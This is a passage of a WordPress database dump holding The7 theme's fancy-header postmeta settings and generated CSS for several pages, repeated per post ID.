(12064,2545,'_dt_fancy_header_title_heading',''),
(12065,2545,'_dt_fancy_header_title_mode','generic'),
(12066,2545,'_dt_fancy_header_title',''),
(12067,2545,'_dt_fancy_header_title_font_size','30'),
(12068,2545,'_dt_fancy_header_title_line_height','36'),
(12069,2545,'_dt_fancy_header_text_transform','none'),
(12070,2545,'_dt_fancy_header_title_color_mode','color'),
(12071,2545,'_dt_fancy_header_title_color','#ffffff'),
(12072,2545,'_dt_fancy_header_subtitle_heading',''),
(12073,2545,'_dt_fancy_header_subtitle',''),
(12074,2545,'_dt_fancy_header_subtitle_font_size','18'),
(12075,2545,'_dt_fancy_header_subtitle_line_height','26'),
(12076,2545,'_dt_fancy_header_subtitle_text_transform','none'),
(12077,2545,'_dt_fancy_header_subtitle_color_mode','color'),
(12078,2545,'_dt_fancy_header_subtitle_color','#ffffff'),
(12079,2545,'_dt_fancy_header_bg_heading',''),
(12080,2545,'_dt_fancy_header_bg_color','#222222'),
(12081,2545,'_dt_fancy_header_bg_image_origin','custom'),
(12082,2545,'_dt_fancy_header_bg_image','a:0:{}'),
(12083,2545,'_dt_fancy_header_bg_repeat','no-repeat'),
(12084,2545,'_dt_fancy_header_bg_position_x','center'),
(12085,2545,'_dt_fancy_header_bg_position_y','center'),
(12086,2545,'_dt_fancy_header_bg_fullscreen','1'),
(12087,2545,'_dt_fancy_header_bg_overlay','0'),
(12088,2545,'_dt_fancy_header_overlay_color','#000'),
(12089,2545,'_dt_fancy_header_bg_overlay_opacity','50'),
(12090,2545,'_dt_fancy_header_scroll_effect','default'),
(12091,2545,'_dt_fancy_header_bg_parallax','0.5'),
(12092,2545,'_dt_fancy_header_responsiveness_heading',''),
(12093,2545,'_dt_fancy_header_responsiveness','enabled'),
(12094,2545,'_dt_fancy_header_responsiveness_switch','778px'),
(12095,2545,'_dt_fancy_header_responsive_height','70'),
(12096,2545,'_dt_fancy_header_responsive_font_size','30'),
(12097,2545,'_dt_fancy_header_responsive_title_line_height','38'),
(12098,2545,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12099,2545,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12100,2545,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12101,2545,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12102,2547,'_dt_fancy_header_layout_heading',''),
(12103,2547,'_dt_fancy_header_title_aligment','center'),
(12104,2547,'_dt_fancy_header_height','300'),
(12105,2547,'_dt_fancy_header_padding-top','0px'),
(12106,2547,'_dt_fancy_header_padding-bottom','0px'),
(12107,2547,'_dt_fancy_header_breadcrumbs_heading',''),
(12108,2547,'_dt_fancy_header_breadcrumbs','disabled'),
(12109,2547,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12110,2547,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12111,2547,'_dt_fancy_header_title_heading',''),
(12112,2547,'_dt_fancy_header_title_mode','generic'),
(12113,2547,'_dt_fancy_header_title',''),
(12114,2547,'_dt_fancy_header_title_font_size','30'),
(12115,2547,'_dt_fancy_header_title_line_height','36'),
(12116,2547,'_dt_fancy_header_text_transform','none'),
(12117,2547,'_dt_fancy_header_title_color_mode','color'),
(12118,2547,'_dt_fancy_header_title_color','#ffffff'),
(12119,2547,'_dt_fancy_header_subtitle_heading',''),
(12120,2547,'_dt_fancy_header_subtitle',''),
(12121,2547,'_dt_fancy_header_subtitle_font_size','18'),
(12122,2547,'_dt_fancy_header_subtitle_line_height','26'),
(12123,2547,'_dt_fancy_header_subtitle_text_transform','none'),
(12124,2547,'_dt_fancy_header_subtitle_color_mode','color'),
(12125,2547,'_dt_fancy_header_subtitle_color','#ffffff'),
(12126,2547,'_dt_fancy_header_bg_heading',''),
(12127,2547,'_dt_fancy_header_bg_color','#222222'),
(12128,2547,'_dt_fancy_header_bg_image_origin','custom'),
(12129,2547,'_dt_fancy_header_bg_image','a:0:{}'),
(12130,2547,'_dt_fancy_header_bg_repeat','no-repeat'),
(12131,2547,'_dt_fancy_header_bg_position_x','center'),
(12132,2547,'_dt_fancy_header_bg_position_y','center'),
(12133,2547,'_dt_fancy_header_bg_fullscreen','1'),
(12134,2547,'_dt_fancy_header_bg_overlay','0'),
(12135,2547,'_dt_fancy_header_overlay_color','#000'),
(12136,2547,'_dt_fancy_header_bg_overlay_opacity','50'),
(12137,2547,'_dt_fancy_header_scroll_effect','default'),
(12138,2547,'_dt_fancy_header_bg_parallax','0.5'),
(12139,2547,'_dt_fancy_header_responsiveness_heading',''),
(12140,2547,'_dt_fancy_header_responsiveness','enabled'),
(12141,2547,'_dt_fancy_header_responsiveness_switch','778px'),
(12142,2547,'_dt_fancy_header_responsive_height','70'),
(12143,2547,'_dt_fancy_header_responsive_font_size','30'),
(12144,2547,'_dt_fancy_header_responsive_title_line_height','38'),
(12145,2547,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12146,2547,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12147,2547,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12148,2547,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12149,2549,'_dt_fancy_header_layout_heading',''),
(12150,2549,'_dt_fancy_header_title_aligment','center'),
(12151,2549,'_dt_fancy_header_height','300'),
(12152,2549,'_dt_fancy_header_padding-top','0px'),
(12153,2549,'_dt_fancy_header_padding-bottom','0px'),
(12154,2549,'_dt_fancy_header_breadcrumbs_heading',''),
(12155,2549,'_dt_fancy_header_breadcrumbs','disabled'),
(12156,2549,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12157,2549,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12158,2549,'_dt_fancy_header_title_heading',''),
(12159,2549,'_dt_fancy_header_title_mode','generic'),
(12160,2549,'_dt_fancy_header_title',''),
(12161,2549,'_dt_fancy_header_title_font_size','30'),
(12162,2549,'_dt_fancy_header_title_line_height','36'),
(12163,2549,'_dt_fancy_header_text_transform','none'),
(12164,2549,'_dt_fancy_header_title_color_mode','color'),
(12165,2549,'_dt_fancy_header_title_color','#ffffff'),
(12166,2549,'_dt_fancy_header_subtitle_heading',''),
(12167,2549,'_dt_fancy_header_subtitle',''),
(12168,2549,'_dt_fancy_header_subtitle_font_size','18'),
(12169,2549,'_dt_fancy_header_subtitle_line_height','26'),
(12170,2549,'_dt_fancy_header_subtitle_text_transform','none'),
(12171,2549,'_dt_fancy_header_subtitle_color_mode','color'),
(12172,2549,'_dt_fancy_header_subtitle_color','#ffffff'),
(12173,2549,'_dt_fancy_header_bg_heading',''),
(12174,2549,'_dt_fancy_header_bg_color','#222222'),
(12175,2549,'_dt_fancy_header_bg_image_origin','custom'),
(12176,2549,'_dt_fancy_header_bg_image','a:0:{}'),
(12177,2549,'_dt_fancy_header_bg_repeat','no-repeat'),
(12178,2549,'_dt_fancy_header_bg_position_x','center'),
(12179,2549,'_dt_fancy_header_bg_position_y','center'),
(12180,2549,'_dt_fancy_header_bg_fullscreen','1'),
(12181,2549,'_dt_fancy_header_bg_overlay','0'),
(12182,2549,'_dt_fancy_header_overlay_color','#000'),
(12183,2549,'_dt_fancy_header_bg_overlay_opacity','50'),
(12184,2549,'_dt_fancy_header_scroll_effect','default'),
(12185,2549,'_dt_fancy_header_bg_parallax','0.5'),
(12186,2549,'_dt_fancy_header_responsiveness_heading',''),
(12187,2549,'_dt_fancy_header_responsiveness','enabled'),
(12188,2549,'_dt_fancy_header_responsiveness_switch','778px'),
(12189,2549,'_dt_fancy_header_responsive_height','70'),
(12190,2549,'_dt_fancy_header_responsive_font_size','30'),
(12191,2549,'_dt_fancy_header_responsive_title_line_height','38'),
(12192,2549,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12193,2549,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12194,2549,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12195,2549,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12196,2521,'_dt_fancy_header_layout_heading',''),
(12197,2521,'_dt_fancy_header_title_aligment','center'),
(12198,2521,'_dt_fancy_header_height','300'),
(12199,2521,'_dt_fancy_header_padding-top','0px'),
(12200,2521,'_dt_fancy_header_padding-bottom','0px'),
(12201,2521,'_dt_fancy_header_breadcrumbs_heading',''),
(12202,2521,'_dt_fancy_header_breadcrumbs','disabled'),
(12203,2521,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12204,2521,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12205,2521,'_dt_fancy_header_title_heading',''),
(12206,2521,'_dt_fancy_header_title_mode','generic'),
(12207,2521,'_dt_fancy_header_title',''),
(12208,2521,'_dt_fancy_header_title_font_size','30'),
(12209,2521,'_dt_fancy_header_title_line_height','36'),
(12210,2521,'_dt_fancy_header_text_transform','none'),
(12211,2521,'_dt_fancy_header_title_color_mode','color'),
(12212,2521,'_dt_fancy_header_title_color','#ffffff'),
(12213,2521,'_dt_fancy_header_subtitle_heading',''),
(12214,2521,'_dt_fancy_header_subtitle',''),
(12215,2521,'_dt_fancy_header_subtitle_font_size','18'),
(12216,2521,'_dt_fancy_header_subtitle_line_height','26'),
(12217,2521,'_dt_fancy_header_subtitle_text_transform','none'),
(12218,2521,'_dt_fancy_header_subtitle_color_mode','color'),
(12219,2521,'_dt_fancy_header_subtitle_color','#ffffff'),
(12220,2521,'_dt_fancy_header_bg_heading',''),
(12221,2521,'_dt_fancy_header_bg_color','#222222'),
(12222,2521,'_dt_fancy_header_bg_image_origin','custom'),
(12223,2521,'_dt_fancy_header_bg_image','a:0:{}'),
(12224,2521,'_dt_fancy_header_bg_repeat','no-repeat'),
(12225,2521,'_dt_fancy_header_bg_position_x','center'),
(12226,2521,'_dt_fancy_header_bg_position_y','center'),
(12227,2521,'_dt_fancy_header_bg_fullscreen','1'),
(12228,2521,'_dt_fancy_header_bg_overlay','0'),
(12229,2521,'_dt_fancy_header_overlay_color','#000'),
(12230,2521,'_dt_fancy_header_bg_overlay_opacity','50'),
(12231,2521,'_dt_fancy_header_scroll_effect','default'),
(12232,2521,'_dt_fancy_header_bg_parallax','0.5'),
(12233,2521,'_dt_fancy_header_responsiveness_heading',''),
(12234,2521,'_dt_fancy_header_responsiveness','enabled'),
(12235,2521,'_dt_fancy_header_responsiveness_switch','778px'),
(12236,2521,'_dt_fancy_header_responsive_height','70'),
(12237,2521,'_dt_fancy_header_responsive_font_size','30'),
(12238,2521,'_dt_fancy_header_responsive_title_line_height','38'),
(12239,2521,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12240,2521,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12241,2521,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12242,2521,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12243,2523,'_dt_fancy_header_layout_heading',''),
(12244,2523,'_dt_fancy_header_title_aligment','center'),
(12245,2523,'_dt_fancy_header_height','300'),
(12246,2523,'_dt_fancy_header_padding-top','0px'),
(12247,2523,'_dt_fancy_header_padding-bottom','0px'),
(12248,2523,'_dt_fancy_header_breadcrumbs_heading',''),
(12249,2523,'_dt_fancy_header_breadcrumbs','disabled'),
(12250,2523,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12251,2523,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12252,2523,'_dt_fancy_header_title_heading',''),
(12253,2523,'_dt_fancy_header_title_mode','generic'),
(12254,2523,'_dt_fancy_header_title',''),
(12255,2523,'_dt_fancy_header_title_font_size','30'),
(12256,2523,'_dt_fancy_header_title_line_height','36'),
(12257,2523,'_dt_fancy_header_text_transform','none'),
(12258,2523,'_dt_fancy_header_title_color_mode','color'),
(12259,2523,'_dt_fancy_header_title_color','#ffffff'),
(12260,2523,'_dt_fancy_header_subtitle_heading',''),
(12261,2523,'_dt_fancy_header_subtitle',''),
(12262,2523,'_dt_fancy_header_subtitle_font_size','18'),
(12263,2523,'_dt_fancy_header_subtitle_line_height','26'),
(12264,2523,'_dt_fancy_header_subtitle_text_transform','none'),
(12265,2523,'_dt_fancy_header_subtitle_color_mode','color'),
(12266,2523,'_dt_fancy_header_subtitle_color','#ffffff'),
(12267,2523,'_dt_fancy_header_bg_heading',''),
(12268,2523,'_dt_fancy_header_bg_color','#222222'),
(12269,2523,'_dt_fancy_header_bg_image_origin','custom'),
(12270,2523,'_dt_fancy_header_bg_image','a:0:{}'),
(12271,2523,'_dt_fancy_header_bg_repeat','no-repeat'),
(12272,2523,'_dt_fancy_header_bg_position_x','center'),
(12273,2523,'_dt_fancy_header_bg_position_y','center'),
(12274,2523,'_dt_fancy_header_bg_fullscreen','1'),
(12275,2523,'_dt_fancy_header_bg_overlay','0'),
(12276,2523,'_dt_fancy_header_overlay_color','#000'),
(12277,2523,'_dt_fancy_header_bg_overlay_opacity','50'),
(12278,2523,'_dt_fancy_header_scroll_effect','default'),
(12279,2523,'_dt_fancy_header_bg_parallax','0.5'),
(12280,2523,'_dt_fancy_header_responsiveness_heading',''),
(12281,2523,'_dt_fancy_header_responsiveness','enabled'),
(12282,2523,'_dt_fancy_header_responsiveness_switch','778px'),
(12283,2523,'_dt_fancy_header_responsive_height','70'),
(12284,2523,'_dt_fancy_header_responsive_font_size','30'),
(12285,2523,'_dt_fancy_header_responsive_title_line_height','38'),
(12286,2523,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12287,2523,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12288,2523,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12289,2523,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12290,2525,'_dt_fancy_header_layout_heading',''),
(12291,2525,'_dt_fancy_header_title_aligment','center'),
(12292,2525,'_dt_fancy_header_height','300'),
(12293,2525,'_dt_fancy_header_padding-top','0px'),
(12294,2525,'_dt_fancy_header_padding-bottom','0px'),
(12295,2525,'_dt_fancy_header_breadcrumbs_heading',''),
(12296,2525,'_dt_fancy_header_breadcrumbs','disabled'),
(12297,2525,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12298,2525,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12299,2525,'_dt_fancy_header_title_heading',''),
(12300,2525,'_dt_fancy_header_title_mode','generic'),
(12301,2525,'_dt_fancy_header_title',''),
(12302,2525,'_dt_fancy_header_title_font_size','30'),
(12303,2525,'_dt_fancy_header_title_line_height','36'),
(12304,2525,'_dt_fancy_header_text_transform','none'),
(12305,2525,'_dt_fancy_header_title_color_mode','color'),
(12306,2525,'_dt_fancy_header_title_color','#ffffff'),
(12307,2525,'_dt_fancy_header_subtitle_heading',''),
(12308,2525,'_dt_fancy_header_subtitle',''),
(12309,2525,'_dt_fancy_header_subtitle_font_size','18'),
(12310,2525,'_dt_fancy_header_subtitle_line_height','26'),
(12311,2525,'_dt_fancy_header_subtitle_text_transform','none'),
(12312,2525,'_dt_fancy_header_subtitle_color_mode','color'),
(12313,2525,'_dt_fancy_header_subtitle_color','#ffffff'),
(12314,2525,'_dt_fancy_header_bg_heading',''),
(12315,2525,'_dt_fancy_header_bg_color','#222222'),
(12316,2525,'_dt_fancy_header_bg_image_origin','custom'),
(12317,2525,'_dt_fancy_header_bg_image','a:0:{}'),
(12318,2525,'_dt_fancy_header_bg_repeat','no-repeat'),
(12319,2525,'_dt_fancy_header_bg_position_x','center'),
(12320,2525,'_dt_fancy_header_bg_position_y','center'),
(12321,2525,'_dt_fancy_header_bg_fullscreen','1'),
(12322,2525,'_dt_fancy_header_bg_overlay','0'),
(12323,2525,'_dt_fancy_header_overlay_color','#000'),
(12324,2525,'_dt_fancy_header_bg_overlay_opacity','50'),
(12325,2525,'_dt_fancy_header_scroll_effect','default'),
(12326,2525,'_dt_fancy_header_bg_parallax','0.5'),
(12327,2525,'_dt_fancy_header_responsiveness_heading',''),
(12328,2525,'_dt_fancy_header_responsiveness','enabled'),
(12329,2525,'_dt_fancy_header_responsiveness_switch','778px'),
(12330,2525,'_dt_fancy_header_responsive_height','70'),
(12331,2525,'_dt_fancy_header_responsive_font_size','30'),
(12332,2525,'_dt_fancy_header_responsive_title_line_height','38'),
(12333,2525,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12334,2525,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12335,2525,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12336,2525,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12337,2527,'_dt_fancy_header_layout_heading',''),
(12338,2527,'_dt_fancy_header_title_aligment','center'),
(12339,2527,'_dt_fancy_header_height','300'),
(12340,2527,'_dt_fancy_header_padding-top','0px'),
(12341,2527,'_dt_fancy_header_padding-bottom','0px'),
(12342,2527,'_dt_fancy_header_breadcrumbs_heading',''),
(12343,2527,'_dt_fancy_header_breadcrumbs','disabled'),
(12344,2527,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12345,2527,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12346,2527,'_dt_fancy_header_title_heading',''),
(12347,2527,'_dt_fancy_header_title_mode','generic'),
(12348,2527,'_dt_fancy_header_title',''),
(12349,2527,'_dt_fancy_header_title_font_size','30'),
(12350,2527,'_dt_fancy_header_title_line_height','36'),
(12351,2527,'_dt_fancy_header_text_transform','none'),
(12352,2527,'_dt_fancy_header_title_color_mode','color'),
(12353,2527,'_dt_fancy_header_title_color','#ffffff'),
(12354,2527,'_dt_fancy_header_subtitle_heading',''),
(12355,2527,'_dt_fancy_header_subtitle',''),
(12356,2527,'_dt_fancy_header_subtitle_font_size','18'),
(12357,2527,'_dt_fancy_header_subtitle_line_height','26'),
(12358,2527,'_dt_fancy_header_subtitle_text_transform','none'),
(12359,2527,'_dt_fancy_header_subtitle_color_mode','color'),
(12360,2527,'_dt_fancy_header_subtitle_color','#ffffff'),
(12361,2527,'_dt_fancy_header_bg_heading',''),
(12362,2527,'_dt_fancy_header_bg_color','#222222'),
(12363,2527,'_dt_fancy_header_bg_image_origin','custom'),
(12364,2527,'_dt_fancy_header_bg_image','a:0:{}'),
(12365,2527,'_dt_fancy_header_bg_repeat','no-repeat'),
(12366,2527,'_dt_fancy_header_bg_position_x','center'),
(12367,2527,'_dt_fancy_header_bg_position_y','center'),
